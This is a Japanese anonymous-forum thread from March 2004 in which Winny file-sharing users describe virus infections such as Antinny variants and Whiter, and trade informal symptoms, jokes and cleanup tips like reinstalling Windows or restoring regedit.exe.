winnyフォルダ内に、"UP"という名の隠しフォルダ & Upfolder.txt という
隠しファイルがいつのまにか存在。削除しようとすると、PC動作が極端に
重くなる&HDDのアクセスが止まらなくなるといった症状。
しばらく待つと削除はできるが、再起動すると上記ファイルが再び作成さ
れる。c:\windows\win.ini ファイルの末尾に
[hoge]
hugo=d:\winny (←うろ覚え)という記述が追加されている。
レジストリ該当部分"run"に"ara-key"の記述なし。
キャッシュフォルダ等は別ドライブの為か、ファイル削除などの被害はなし。

私の環境ではメーラにOE以外のあるソフトを使用しているのですが、
(迷惑がかからないよう一応伏せます)該当フォルダ(c:\Program Files\○○)
内に「○○_Loader.exe」という見覚えのない実行ファイルが存在し、PC起動時
に自動実行されていました。
そのファイル「だけ」タイムスタンプが異常だったので、タスクマネージャから
切った後、削除&レジストリrun部分も削除。

以降、UPフォルダ&upfolder.txt作成やwin.ini追記などはなくなりました。
一つしか例がないので憶測なのですが、もしかすると、プログラムファイル
の中からランダムにEXEを見つけ、その後ろに"_Loader"を付けたファイルを
偽装作成するような動作をするのではないでしょうか。

長文ですみません。亜種の解決策の一つとして見てもらえれば幸いです。


210 :[名無し]さん(bin+cue).rar:04/03/06 20:28 ID:5STpRWXV
nyのアイコンが青から黄に変わったんだけど、何でしょうか?


211 :[名無し]さん(bin+cue).rar:04/03/06 20:28 ID:QMNcJG65


212 :[名無し]さん(bin+cue).rar:04/03/06 20:40 ID:/BGih7mv
信号

213 :[名無し]さん(bin+cue).rar:04/03/06 20:53 ID:5STpRWXV
何の信号?


214 :[名無し]さん(bin+cue).rar:04/03/06 20:55 ID:qqdneOwM
日本だと信号は青→黄→赤ってなるんすよ

215 :[名無し]さん(bin+cue).rar:04/03/06 23:02 ID:ZdG1UfyO
今までウィルスに感染したことがない俺は勝ち組

216 :[名無し]さん(bin+cue).rar:04/03/06 23:46 ID:d0JDEET8
atok17でWhiterにやられますた。
ええそりゃもうきれいサッパリと

217 :[名無し]さん(bin+cue).rar:04/03/06 23:56 ID:q17rGn2f
ATOKをちゃんと買っている俺は勝ち組

218 :[名無し]さん(bin+cue).rar:04/03/07 00:02 ID:n19Q0ZnZ
なんか209さんと似てるようで似てないんですが。
AVG6(定義ファイル:2004/03/05)、トレンドマイクロオンラインスキャン無反応。

winnyフォルダ内に、"UP"というフォルダが生成され、その中に
「(シリアル集)Pandora - 2004年03月06日版[補強板].lzh」と似た名前のexeが入っている。
lzhの中身も生のexeも同一でサイズが390,656バイト。

また、system.ini内に
[SciCalc]
LastPath=D:\Ny2のパス
win.ini内に
[SciCalc]
layout=0
UseSep=1
という記述が。(こちらは関係ない気が)

レジストリ該当部分"run"に"ara-key"の記述なし。

最近Pandoraを検索してて妙に思っていたのですが、3月4日からこのようなアーカイブが
絶えずありました。日付が変わると自動生成とかするようになっているのでしょうか…

219 :[名無し]さん(bin+cue).rar:04/03/07 00:40 ID:keVQTDZP
>月姫aviアテナ映像中出し塩田剛三格闘技ラジオまん汁枯れるまでAPP11養神館マンコogg代々木忠DivX5女子大生.exe

こんなのが流れてきて
なんかワラタ

220 :sage:04/03/07 01:25 ID:OkSXyOmT
各ユーザーのTemp環境変数フォルダに、コピーを大量に作ってるっぽい。
regedit.exeをnotepad.exeに置き換えて、レジストリのRunに自分自身を登録。
んで、OEのメールアドレスやWinnyのDownloadフォルダ一覧を埋め込んだ
テキストファイルを登録名・使用者名のファイル名で作成して
Winnyの関連フォルダに放り込んでおき、それを見た初心者はビックリ、

ってパターンかな。


221 :[名無し]さん(bin+cue).rar:04/03/07 04:49 ID:5KYIZmXe
>>218
や、むしろPandoraはnyで落とそうとも思わないし。

222 :[名無し]さん(bin+cue).rar:04/03/07 07:38 ID:W5QQcwF+
>>221 どこで落とせますか?

223 :[名無し]さん(bin+cue).rar:04/03/07 07:53 ID:Cbff+9mD
昨日からなんか接続されなくなって
検索リンクが出てこずに切断の横の数字だけが増えていくだけだったんで
おかしいなと思ってログ情報を見てみたら
アップフォルダファイル読み込み失敗と出ていて
次にシステム情報を見てみたら勝手にアップフォルダが一個出来てて
そのアップフォルダを削除しようと思って探してるんですけど
いくら探してもも見つからない。
誰か同じようなのに引っかかった人がいたら解決方法を
教えてもらえませんか?よろしくお願いします。

224 :[名無し]さん(bin+cue).rar:04/03/07 09:15 ID:mPUgkB3R
(・∀・)ニヤニヤ

225 :[名無し]さん(bin+cue).rar:04/03/07 09:51 ID:3snZ9dUo
俺もうっかりtxtのアイコンのEXEをクリックしてしまった・・
少し動きが違うみたいだけどこれも亜種かな??

勝手にupfolderに ダウンロード先のフォルダを登録されてしまう。
upfolderを空にして読み取り専用にしてPCをリブートしてWinnyを
起動しても もうupfolderに書き込まれないから大丈夫かな?って
思ったがPCつけっぱなしでWinnyは落とした状態で数時間放置すると
いつのまにか又書き込まれてる・・・

226 :[名無し]さん(bin+cue).rar:04/03/07 11:50 ID:v9WrilkK
>225
うちも同じだった。レジストリか、バッチかなんかで
書き換えてるんだろうけど、それの元が分からない。
で、OSクリーンインストールで対処。

しかし、ウィルス作者とうぃにユーザーとのイタチゴッコ
なのね。

227 :[名無し]さん(bin+cue).rar:04/03/07 11:54 ID:d43aGPjY
叩かれるのを承知で兄さん方教えてたもれ
nyで落とした瞬間に感染するウィルスはあるのですか?
自分がクリックOR解凍しなきゃ大丈夫ですよね?
ケミ巣鳥落としちゃったんですが、ゴミ箱ぽぃで大丈夫だよね

228 :[名無し]さん(bin+cue).rar:04/03/07 12:04 ID:mPUgkB3R
うん

229 :[名無し]さん(bin+cue).rar:04/03/07 12:05 ID:C3sMpAq6
>>227
exeだったらな。

230 :[名無し]さん(bin+cue).rar:04/03/07 12:10 ID:d43aGPjY
サンクス!
兄弟!

231 :[名無し]さん(bin+cue).rar:04/03/07 13:41 ID:3snZ9dUo
>>226
一応悪さをしてるEXEは発見して削除したから大丈夫にはなったんだけど・・・
レジストリを見てもそれっぽい奴が居ないし ちょっとモヤモヤする

232 :[名無し]さん(bin+cue).rar:04/03/07 14:38 ID:yWD3kTy+
regeditすると、メモ帳立ち上がっちゃう・・・
窓の手でどうやって、レジストリ復活させるのですか?

233 :[名無し]さん(bin+cue).rar:04/03/07 15:01 ID:HHePntnx
>>232
それはアレだろ、おそらく regedit.exe の中身が
notepad.exe に書き換えられてるんじゃないか?
だとしたら、窓の手じゃ無理。
オリジナルの regedit.exe でもう一度上書きするしかない。

多分、ウィンドウズのインストールディスクにあるcabファイルの
どれかの中にオリジナルのexeはあると思う。

それをウィンドウズのインストールフォルダ(デフォルトなら c:\windows)にあるexeに上書き。

以上の説明でわからない場合は、サクッとクリーンインストールが無難。

234 :[名無し]さん(bin+cue).rar:04/03/07 15:12 ID:yWD3kTy+
>>233
CDの中にregedit.exe見つけました。
の他に、CH_ファイルとHL_ファイルが有るんですけど
これも上書きしたほうが良いんですかね?

235 :[名無し]さん(bin+cue).rar:04/03/07 15:18 ID:yWD3kTy+
あっ!違った・・・
regedit.exe検索したら
\Local Settings\Application Data\Microsoft\CD Burning¥I386
フォルダの中に発見それクリックしたら、レジストリ起動しました。
これ、コピーで大丈夫かなぁ?

236 :[名無し]さん(bin+cue).rar:04/03/07 15:50 ID:tPGKk9zG
>>235
同じ場所regedit.exe にコピーしても無駄
また中身がnotepad.exeになる。

regedit.exeを 別の場所において、実行。
それで改変されたレジストリ直さないとだめ。

237 :[名無し]さん(bin+cue).rar:04/03/07 15:54 ID:F/kJ98w6
あちゃ〜、ウイルスに感染してるっぽい
例のCPU使用率100%になるやつ

ヘタレだからnyで落としたファイルはまだ一つも触ったことないのに・・・
一体いつ感染したんだ?

238 :[名無し]さん(bin+cue).rar:04/03/07 15:57 ID:yWD3kTy+
>>236
そうみたいですね。
さっきから、やってたけど戻っちゃう。
どこ改変されてるかわからない・・・

239 :237:04/03/07 15:58 ID:F/kJ98w6
・・・と思ったらウイルスには感染してなかった
CPU使用率100%だったのはNAVがおかしいらしい

240 :[名無し]さん(bin+cue).rar:04/03/07 16:17 ID:tPGKk9zG
>>238
ほんとはアンチウイルスソフト会社に感染もとのexeファイル解析してもらってワクチンソフト作ってもらうのが一番いいんだけどね。
ま 自己責任だから自分でなんとかするしかないね。

改変場所調べるのも面倒だし、修正したつもりでも改変の見落としもあると無意味なので
OS再インストールのほうがいいかもね。

241 :[名無し]さん(bin+cue).rar:04/03/07 16:37 ID:k2w59VcS
2MB以上のシリアル集によく入っている
"0001.txt .exe"
ってTrillianなんだね。
あれ作った痴呆はだれ?

http://internet.watch.impress.co.jp/www/article/2002/0530/tri.htm

242 :[名無し]さん(bin+cue).rar:04/03/07 17:25 ID:Awix4a9W
初心者でよくわからないのですが、画像はウイルスに感染するって
聞いたんですけど動画でウイルスが感染することはあるんでしょうか?

243 :7:04/03/07 18:12 ID:JO1s4dC4
100%ウィルス対策まだですか。・゚・(ノд`)・゚・。

244 :[名無し]さん(bin+cue).rar:04/03/07 18:13 ID:LM3O+jVA
>>242
  _, ,_  パン パパンパン パン パパーン
( ‘д‘)
  ⊂彡☆))Д´)

245 :[名無し]さん(bin+cue).rar:04/03/07 19:13 ID:xZPVnp0d
質問する前に>>1読め
CPU100%なら実行中のプロセスを全部書き出せ
スペックも書け
PC初心者板も見ろ

246 :[名無し]さん(bin+cue).rar:04/03/07 20:27 ID:NX3q2LTB
ぬるぽにやられたんで、ノートン体験版入れてウイルス削除したんだけど、
Winny本体は一度アンインストールして、もう一回インストールしたりとかしなくていいですか?

247 :[名無し]さん(bin+cue).rar:04/03/07 20:29 ID:LM3O+jVA
>>246
  _, ,_  パン パパンパン パン パパーン
( ‘д‘)
  ⊂彡☆))Д´)

248 :[名無し]さん(bin+cue).rar:04/03/07 20:38 ID:n9pOa/TW
せっかく誘導されてきたのに
か わ い そ う に・・・

249 :[名無し]さん(bin+cue).rar:04/03/07 20:40 ID:r7bARfGq
>>248
  _, ,_  パン パパンパン パン パパーン
( ‘д‘)
  ⊂彡☆))Д´)

250 :[名無し]さん(bin+cue).rar:04/03/07 20:46 ID:YWc3Rfux
>>246
http://nyweb.hp.infoseek.co.jp/
ここ見て確認。NAVがUpフォルダ消したりまではしなさそう。

不安ならOS再インストール。

251 :[名無し]さん(bin+cue).rar:04/03/07 21:01 ID:LM3O+jVA
>>248
誘導されたのか?どこの馬鹿だ?

252 :[名無し]さん(bin+cue).rar:04/03/07 21:08 ID:YWc3Rfux
>>251
 誘導したの私です。
 まさかテンプレも読まずに、そのまま質問するとは思ってませんでした。
 ご迷惑をお掛けしました。

253 :246:04/03/07 21:15 ID:2SC8LZn8
テンプレも読まずに質問するという馬鹿なことをしてしまい恥ずかしい限りです・・・
ご迷惑をおかけしました。
>>250
ご親切にありがとうございます。

254 :[名無し]さん(bin+cue).rar:04/03/07 21:20 ID:8uGa3Hjy
自分もココをすすめられて来ました。

 ◆WinXPの場合
  1.エクスプローラで CD-ROM ドライブを右クリックして [プロパティ] をクリック
  2.[自動再生] タブをクリックし、ドロップダウンリストで「音楽 CD」を選択
  3.「実行する動作を選択」にチェックし、「何もしない」を選択して「OK」をクリック

これをやったんですが、ccdをマウントするとsetup.exeが起動しちゃいます。
ウイルスじゃなかったから良かったけど、どうすれば起動しなくなりますか?


255 :[名無し]さん(bin+cue).rar:04/03/07 21:21 ID:WGmz8eEk
べつに屑共に謝る必要なんて無いよ

256 :[名無し]さん(bin+cue).rar:04/03/07 22:38 ID:VHMDlxqa
>>254
>>30

257 :254:04/03/07 23:16 ID:8uGa3Hjy
>>256
見落としてました。
無事解決です。ありがとうございます!

258 :[名無し]さん(bin+cue).rar:04/03/07 23:31 ID:3sWRi7xn
デーモンの色が赤から、
緑に突然変わっちゃったy〜〜。

どうしよ〜〜??

259 :[名無し]さん(bin+cue).rar:04/03/07 23:35 ID:N4LMTQ57
>>258
青信号だから安心して進め、GO

260 :[名無し]さん(bin+cue).rar:04/03/07 23:39 ID:1bYCZhis
う゛ぃるs

261 :[名無し]さん(bin+cue).rar:04/03/07 23:46 ID:KB+w9GAP
Emulationにチェック入れたんじゃねーの?>>258

262 :[名無し]さん(bin+cue).rar:04/03/08 00:17 ID:JuSYPiT0
はぁ・・・_| ̄|○


263 :[名無し]さん(bin+cue).rar:04/03/08 00:40 ID:mJfx04Z7
>>261
それだったy。
わ〜い、わ〜い、直った。
ありがd。

264 :[名無し]さん(bin+cue).rar:04/03/08 00:41 ID:JyTwbhKr
明日には逮捕されててもおかしくない奴等イッパイだな

265 :[名無し]さん(bin+cue).rar:04/03/08 01:31 ID:NBQdHJPi
最後に大物エロ動画を落とした・・・

266 :[名無し]さん(bin+cue).rar:04/03/08 02:25 ID:32e+YaF8
ウイルス喰らってるやつが偉そうに「俺」とか言ってるの見ると笑える
「僕」って言えw

267 :[名無し]さん(bin+cue).rar:04/03/08 04:16 ID:l5G4N/37
「漏れ」じゃダメでつか?

268 :[名無し]さん(bin+cue).rar:04/03/08 08:12 ID:upyGudva
「漏れ」なら許す

269 :[名無し]さん(bin+cue).rar:04/03/08 12:13 ID:y84erTJ/
asano@peach.ocn.ne.jpへどうぞ

270 :[名無し]さん(bin+cue).rar:04/03/08 12:39 ID:mE/bRujo
誰?

271 :[名無し]さん(bin+cue).rar:04/03/08 13:12 ID:RuXMjo0b
何?

272 :[名無し]さん(bin+cue).rar :04/03/08 14:11 ID:VAhI1Q2Y
つーか、あの偽装exeって放流する人が
わざわざセットで配ってるのか?

273 :[名無し]さん(bin+cue).rar:04/03/08 14:29 ID:grpoJPdR
わざわざセットで配ってるんでしょ
モノホンのブツとウイルスをわざわざ一緒に入れて圧縮してるんだから

274 :[名無し]さん(bin+cue).rar:04/03/08 14:39 ID:jh1mK2JB
この前ウィルス入ってたけど・・・
ア イ コ ン を 変 え て ま でウ ィ ル ス に 感 染 さ せ た い か ?

275 ::[名無し]さん(bin+cue).rar:04/03/08 15:21 ID:R571xAoe
ファイルを落としたんですけど、RARファイルになってて
解凍したらLZHファイルになってまた解凍したら
RARファイルになりました。
それから、RAR→LZH→RAR→LZHが続いているんですけど
ウイルスですか?


276 :[名無し]さん(bin+cue).rar:04/03/08 15:22 ID:nea8ueil
さっき一瞬画面いっぱいに女の幽霊の顔が
写し出されたんだけど、これって何か分かりますか?
全体に灰色っぽくて目が怖かったです
なんか変なファイル実行しちゃったかなあ・・・

277 :ぼるじょあ ◆yBEncckFOU :04/03/08 15:37 ID:w5MDsfo7
>>276
(・3・) エェー これじゃないよNE?
ttp://www.vector.co.jp/soft/win95/amuse/se217070.html

278 :[名無し]さん(bin+cue).rar:04/03/08 15:37 ID:J7Kz1qdv
>>276
それはビックリフラッシュですね。
ウイルスではないので安心して下さい。

279 :[名無し]さん(bin+cue).rar:04/03/08 15:48 ID:n7mw9ZRK
先ほどフォルダ偽装のexeに引っかかり、
僕のデスクトップが消えてしまったのですが誰かわかりますか?


280 :[名無し]さん(bin+cue).rar:04/03/08 15:50 ID:J7Kz1qdv
>>279
デスクトップが消えただけでドライブのファイルは無事なの?

281 :[名無し]さん(bin+cue).rar:04/03/08 15:55 ID:nea8ueil
>277、278
ありがとうございます。たぶんそれじゃないかと思います。
ずいぶん昔(1、2年以上前)にhikaru.exeを実行したような気がします。
でも突然今日でてくるのかなあ?今さっきも出ました。
どうやったら止められるのでしょう?本体らしきものが見あたらないんです。

282 :ぼるじょあ ◆yBEncckFOU :04/03/08 16:10 ID:w5MDsfo7
>>281
(・3・) エェー ttp://www.hatena.ne.jp/1075486887
          参考になるかNA?

283 :281:04/03/08 16:44 ID:nea8ueil
>282
win.iniの中に探しても無く、レジストリにhikaru.exeがあったので
削除しました。が、再起動したら顔がまた出てきました。
もうあきらめモードです。(-_-)

284 :[名無し]さん(bin+cue).rar:04/03/08 16:53 ID:n7mw9ZRK
デスクトップに例のオタク画像のキャラが動き出しました。
なんやこれ??もうなにがなんだかさっぱりだ。。。。

285 :[名無し]さん(bin+cue).rar:04/03/08 17:43 ID:bY0DrDDZ
OSの再インストールで万事解決

286 :ぼるじょあ ◆yBEncckFOU :04/03/08 17:46 ID:w5MDsfo7
(・3・) エェー タスクマネージャーに出てませんKA?

287 :[名無し]さん(bin+cue).rar:04/03/08 17:48 ID:n7mw9ZRK
オタクがなにか一人でしゃべってます。キモコワ!
nyなんてやるんじゃなかった…。

288 :[名無し]さん(bin+cue).rar:04/03/08 17:51 ID:C8d1lhBm
>>287君の新しい友達だよ

289 :ぼるじょあ ◆yBEncckFOU :04/03/08 17:57 ID:w5MDsfo7
(・3・) エェー ボクちょっとしかオタクじゃないC

290 : ◆H6wikgcXIU :04/03/08 18:12 ID:XKwoA/K/
テスト。

291 :[名無し]さん(bin+cue).rar:04/03/08 19:23 ID:ZaTROIN5
>>238
全レジストリを「notepad.exe」で検索する。
怪しいキーが見つかったり、何かヒントが得られるかもしれません。

>>275
>>279
挙動不審なファイルに関する質問は、極力ハッシュを貼っていただきたい。

>>275
その状態でループしてるんですか。

292 :[名無し]さん(bin+cue).rar:04/03/08 21:33 ID:AtemXoZc
[感染しないためにやっておくべきこと] で、
・シングルクリックをダブルクリックにする
とあるのですが、これはファイルの実行をWクリックにするという意味ですよね??
普通はこうだと思うんですが、メーカー品や一部OSではシングルクリックのものがあるのでしょうか??

>>225>>87等でクリックしたら感染とあるんですが、これはシングルクリックなのでしょうか??
それともWクリックで実行に設定していてもシングルクリックで感染するものがあるんでしょうか??
ないと思うんですが、このスレ読んでいると規準が判らないもので・・・


293 :[名無し]さん(bin+cue).rar:04/03/08 21:45 ID:QTI1BqfB
>>292
XPってインストール直後はシングルクリックじゃないか?
プリインストールPCもそうだったし、自分でインスコしてもそうだった気がする。
全メーカーがそうなのかは知らないが。

この場合はダブルクリック(実行)のことだろう。
シングル、つまりファイルを選択しただけでウイルスコードが実行されるなんて((((((;゜Д゜))))))

(´-`).。oO(絶対あり得ない、とは言えないけどね)

294 :[名無し]さん(bin+cue).rar:04/03/08 21:47 ID:dRJMH/F3
>292

(゚Д゚)ハァ?
そんなことも知らない初心者は帰った方がいいよ マジで



295 :[名無し]さん(bin+cue).rar:04/03/08 21:48 ID:AtemXoZc
>>293
THXです。そういえば購入後即変更した記憶が。
やっぱり無いですよね、安心しました。(無いよね・・・・)



296 :[名無し]さん(bin+cue).rar:04/03/09 00:07 ID:vxlOwu7U
先程ダウソ生活3年目にして初ウイルス喰らいますた。
外付け込みでファイル100G消された・・・(´・ω・`)

297 :[名無し]さん(bin+cue).rar:04/03/09 00:51 ID:dXovK+fh
お(・∀・)め(・∀・)で(・∀・)と(・∀・)う!

298 :[名無し]さん(bin+cue).rar:04/03/09 01:17 ID:wwC4lf3Q
(・∀・)オメデd!

299 :[名無し]さん(bin+cue).rar:04/03/09 01:30 ID:QIVzuTtc
(・∀・)ニヤニヤ

300 :ぼるじょあ ◆yEbBEcuFOU :04/03/09 02:11 ID:Z0jPpEv+
(・3・) エェー ワトソン入れろYO

301 :[名無し]さん(bin+cue).rar:04/03/09 02:51 ID:nnziGJvQ
win.iniに顔文字でセクションが作られてて、ぬるぽかと思ったらUPフォルダが出来てない。
ウィルスバスターオンラインも反応なし。

亜種かな?

302 :[名無し]さん(bin+cue).rar:04/03/09 08:49 ID:nc0/A1Xq
>>301
アーーーッシュ!!


あ〜ば〜ろ〜ん♪

303 :[名無し]さん(bin+cue).rar:04/03/09 12:34 ID:bbD9M8wr
Downのフォルダに入ってたものがなぜかUPされてるのですがウィルスにやられたのでしょうか?
UPフォルダは見てみたら空なんですが・・・

304 :[名無し]さん(bin+cue).rar:04/03/09 12:37 ID:8H9ej8gP
>>303
たぶん無問題

305 :[名無し]さん(bin+cue).rar:04/03/09 12:41 ID:WpyBP7Q0
upフォルダ内に消しても消してもLHTMP000.LZHというファイルと
その他キャッシュ内にあるデータの名前をつけたjpgファイルと
LZH形式のファイルが作り続けられるのはどうして?
たしけて。

306 :[名無し]さん(bin+cue).rar:04/03/09 12:55 ID:KQ4VRSfe
大きいサイズの物をnyで落した後、再起動するとCドライブの空き容量がどんどん減っていくのですが何故でしょうか?
消そうとするとアクセスしてて消せないと出るのでsafeモードで落した物を削除すると治まるのですがウィルスでしょうか?

307 :[名無し]さん(bin+cue).rar:04/03/09 12:58 ID:uMfOPIfQ
>>306
はいウィルスです。そのパソコンはもうダメだから捨てて新しいの買って。

308 :[名無し]さん(bin+cue).rar:04/03/09 13:02 ID:TYtIFE0D
>>305
それはニダだね。

309 :[名無し]さん(bin+cue).rar:04/03/09 13:08 ID:xrlhedMG
>>306
Whiter対策
ttp://mxtrojan.at.infoseek.co.jp/column02.html

310 :[名無し]さん(bin+cue).rar:04/03/09 13:16 ID:KQ4VRSfe
[040220] OL姉妹(iso).part1.rar dd7fa6e35675373c8920cc51e3d93e99
これを落したのですが・・・何かはいってたのでしょうか・・・

311 :[名無し]さん(bin+cue).rar:04/03/09 13:32 ID:Z91V0WL5
ぬるぽ

312 :303:04/03/09 13:41 ID:bbD9M8wr
UpFolderのテキストにに[BBS]Path=F:\WINNY2\Downというのがあったため削除したのですが、再起動するたびにまた自動で同じものが作られてしまいます。
多分これが原因でDownフォルダのUPされてしまうっぽいのですが・・・
どなたか対処方を教えていただけないでしょうか?

313 :[名無し]さん(bin+cue).rar:04/03/09 14:30 ID:OFDz1ga/
>>312
システムの復元は試した?

314 :[名無し]さん(bin+cue).rar:04/03/09 14:46 ID:lBzlXGmV
ノートン先生のウイルスチェックを書けたら、脅威が検出されて、
ログをみると、自動的に削除しましたとかかれているんですが、
これは、このファイルはもうアンチニーがないから安全だよということですか?

315 :[名無し]さん(bin+cue).rar:04/03/09 15:31 ID:xIDmD4bH
● 名称未定
○ WMPファイルのアイコンに偽装
○ ノートン未対応
○ .mp3  (多数のスペース)  .exe として単独で流通
○ 使用者名を「Winnyで違法ファイル集めています」に変更
○ レジストリエディタを使用不能にする(窓の手などで復旧可)
○ システムの復元を使用不能にする(復旧困難。不可能かも?)

↑これのシステムの復元に関して、解決方法はありませんか?

316 :[名無し]さん(bin+cue).rar:04/03/09 16:11 ID:R9Ecg2Nt
>>315
報告乙&ご愁傷

151 220 236 あたりの関連ログを読んで レジストリの怪しい部分総当りで修正するしかないんじゃない?
ウイルス自体にさらになんらかの改悪が加えられてたら(亜種・新種だったら)
今のところ解決方法は再インストールが最善。
まずないだろうけど再インストールしてもだめなのにかかってたらあきらめる。


317 :[名無し]さん(bin+cue).rar:04/03/09 17:39 ID:rF5oSUYi
新種とか亜種だと思ったらトレンドマイクロとシマンテックに該当ファイル送っておけよ

318 :[名無し]さん(bin+cue).rar:04/03/09 18:27 ID:+ZUZUDTM
BSマンガ夜話の「あたしンち」という動画をカーソルでクリックすると
CPUが100%になるのですが解決方法はありませんか?


319 :[名無し]さん(bin+cue).rar:04/03/09 18:33 ID:qQqGoGxq
クリックしない。

320 :[名無し]さん(bin+cue).rar:04/03/09 18:38 ID:6541bOkA
>>318
筐体ごと窓から投げ捨てる

321 :303:04/03/09 18:40 ID:bbD9M8wr
>>313
初心者なのでほんとすいませんがシステムの復旧というのはどうやってやるのでしょうか?

322 :318:04/03/09 18:46 ID:nfEaIZ4H
このファイルを消そうと思ったのですがどうやっても消せません。

323 :[名無し]さん(bin+cue).rar:04/03/09 19:29 ID:2/owBEI7
ここは初心者なインターネットですね

324 :[名無し]さん(bin+cue).rar:04/03/09 20:01 ID:uwrC5LyD
圧縮ファイルをダウンロードして、開く前にノートンかけたら、ウィルスが見つかったので、
「その手にかかるか。ばーか」と言ってから、削除しようとしたら、焦ったのか思わずダブルクリックしてしまい、
ファイルが開いて、ウィルスに感染した漏れをどう思いますか?

325 :[名無し]さん(bin+cue).rar:04/03/09 20:18 ID:ohhNmg+z
好き

326 :[名無し]さん(bin+cue).rar:04/03/09 20:21 ID:sWVsH6gU
>>324
(゚∀゚)

327 :[名無し]さん(bin+cue).rar:04/03/09 20:28 ID:8Nt6PIRU
>>324
嘘をつくのが下手だなーと思いました。

328 :[名無し]さん(bin+cue).rar:04/03/09 20:56 ID:5mNZZs1t
>>321
スタート→プログラム→アクセサリ→システムツール→システムの復元

329 :[名無し]さん(bin+cue).rar:04/03/09 21:02 ID:nZApZix6
>>276
ぐぐれぐぐれ。
http://allabout.co.jp/computer/comicalsite/closeup/CU20020515A/index5.htm
でもウィルス入りも出回っとんのね・・タチ悪ぅ。

330 :[名無し]さん(bin+cue).rar:04/03/09 21:15 ID:EtL0M6AZ
>>324
( ゚Д゚)⊃旦 まずはお茶でもどうぞ

331 :[名無し]さん(bin+cue).rar:04/03/09 22:19 ID:S3AJ12my
>>329
コレ面白そうだな。
めちゃくちゃ怖いって書いてあるけどw

332 :[名無し]さん(bin+cue).rar:04/03/09 23:18 ID:x2yYiUzZ
>>322
同一名ファイルを作って上書きしてもダメ?

333 :[名無し]さん(bin+cue).rar:04/03/09 23:36 ID:lGd4DwOs
>>318
ファイルをクリックしないで削除しる


334 :[名無し]さん(bin+cue).rar:04/03/09 23:45 ID:854yS1/c
感染しないようにバーチャルPC使おうとしたんですよ。
そしたらそれがウイルス入りだったんですよ。
ああ・・・

335 :[名無し]さん(bin+cue).rar:04/03/09 23:47 ID:qTEi98nr

あのさー

pandoraがどんどんウイルス?多いのだが
解凍する前に中身見てるので感染はしてないと思いますけどね。

あれって自動生成なのかな。日付も変わってるし−設定じゃ無意味だ
感染したPCから日時を読み込んでファイル名に日付を入れてるって事かな

ファイル事態の更新日時は同じだから(CRCチェックはしてないけど)自分自身をコピーなのか


前は.htmlで金儲けの仕方とかが入ってたなぁ
2月からpandoraは荒れてますなぁWEBで落とそうかな。楽しみがないけど
最新号だけじゃなくてreadmeを読むのが好きなんですけどね。
あれ増えてるのかわからんし。趣味で過去ログも集めてますw

336 :[名無し]さん(bin+cue).rar:04/03/09 23:59 ID:UPkSAGY4
中身が382KBのexeばかりの場合、恐らく自動生成。
自分自身をいくらか梱包して、毎日更新の模様。
勝手にUPフォルダが作られてそこに入れられる。

337 :[名無し]さん(bin+cue).rar:04/03/10 03:41 ID:/JLJgNMp
誰か実行ファイルで697,344byteのウィルス(?)って知りませんか?

勝手にスタートアップに登録され、リンクをたどった先のファイルを削除しても
数回再起動するたびに複製&スタートアップに勝手に登録されます
ファイル名はランダムで、作成するたびに変わります

今のところ目だった症状は出ていません。
spybotでは検出されないのでウィルスではないかと(((( ;゚д゚))))ガクガクブルブル

338 :[名無し]さん(bin+cue).rar:04/03/10 04:52 ID:VcFsREMJ
>>337
それはニダだね。

339 :[名無し]さん(bin+cue).rar:04/03/10 10:58 ID:VcB+0a8/
>それは二ダだね。
↑何かの決まり文句ですか?
って聞いても教えてくれないだろうなー。

340 :[名無し]さん(bin+cue).rar:04/03/10 13:10 ID:rwYC71WR
>>337
システムの復元

341 :[名無し]さん(bin+cue).rar:04/03/10 13:21 ID:7ARTCMf0
My Documentsにあるマイ ピクチャとマイ ミュージックをいくら削除しても
復活するんですがウイルスでしょうか?
シマンテックに報告したほうがいいのかな・・・

342 :[名無し]さん(bin+cue).rar:04/03/10 14:02 ID:m4lCjCIS
春って本当に凄いのが沸いてくるんだなあ

343 :341:04/03/10 14:10 ID:7ARTCMf0
>>342
すいません初心者なので・・・。
一個ならいいんですがランダムで復活するから困ってるんです。
どなたか対処法わかりませんでしょうか?

344 :[名無し]さん(bin+cue).rar:04/03/10 14:16 ID:WlUDLWLr
>>343
ウィルスでもなんでもないから放置。
それでも気になるなら対処法を教えよう。
窓 か ら 投 げ 捨 て ろ

345 :[名無し]さん(bin+cue).rar:04/03/10 15:11 ID:M/GbE2Oy
VPC のハッシュを貼るのは無粋?


346 :[名無し]さん(bin+cue).rar:04/03/10 15:46 ID:uS4Mt/sy
NT AUTHORITY¥SYSTEMによって強制終了されます、ってのが最近多いんだっけど
これってもしかしてウイルスですか?

347 :[名無し]さん(bin+cue).rar:04/03/10 17:35 ID:H06jLjbm
ウイルス。

348 :[名無し]さん(bin+cue).rar:04/03/10 17:39 ID:IVKCx9p0
パソにガソリンぶちまけて火をつければ修復します

349 :[名無し]さん(bin+cue).rar:04/03/10 22:39 ID:tIlvacR2
ところでwhiterはノートンで検出できるの?>>88を見るとできるみたいだけど・・・
今までAVGを信頼してたけどこの間全消去されて全く信じられなくなったので、ノートンを買おうと思ってるんですが。
その前はマカフィー使ってて、これも全然駄目だったし・・・orz

350 :[名無し]さん(bin+cue).rar:04/03/10 23:02 ID:E7fWycss
>>348
それはあれですか?
面白いんですか?

351 :[名無し]さん(bin+cue).rar:04/03/10 23:13 ID:0/YGLnH6
>349がノートンを信頼してまたウィルスにやられるに一票

352 :[名無し]さん(bin+cue).rar:04/03/10 23:18 ID:R0gvd/BZ
>>349
だから報告済みのは検出できるが、
亜種・未報告は検出できない。
それはどのアンチウイルスソフト使っても同じ。
whiter怖いなら過去ログにある対策を講じれば一応安心かと思ってます。

353 :[名無し]さん(bin+cue).rar:04/03/10 23:59 ID:tIlvacR2
>>352
一応対策は全部してるんですが、この状態ならwhiter喰らっても平気なのかな・・・怖いので試すこともできないし・・・。
今までウイルスなめてたけどwhiterはホントにやばいと思った。マウントした瞬間にデータ消されはじめて慌てて電源切ったけどすでに全部消えてたし・・・。
とにかく、とりあえず「報告済み」のは検出できるんですね。AVGはそれすらできなかったので、それだけで乗り換える意味はありますね。

>>351
もういつでも覚悟してます。退避専用外付けHDD(普段は電源OFF)まで用意してバックアップとってるし。
正直やられる時はやられると思う。亜種とか新種だったら対処できないし。予防だけじゃなくて予備をしておく方がいいですね。

354 :[名無し]さん(bin+cue).rar:04/03/11 01:04 ID:eb84dQWX
>>353
俺はNAV2004だぜ!!

355 :[名無し]さん(bin+cue).rar:04/03/11 02:36 ID:VXnhZP12
やられた。nyのダウンドライブのフォルダすべてが、??・.ミ(ッ みたいなわけのわからん文字で
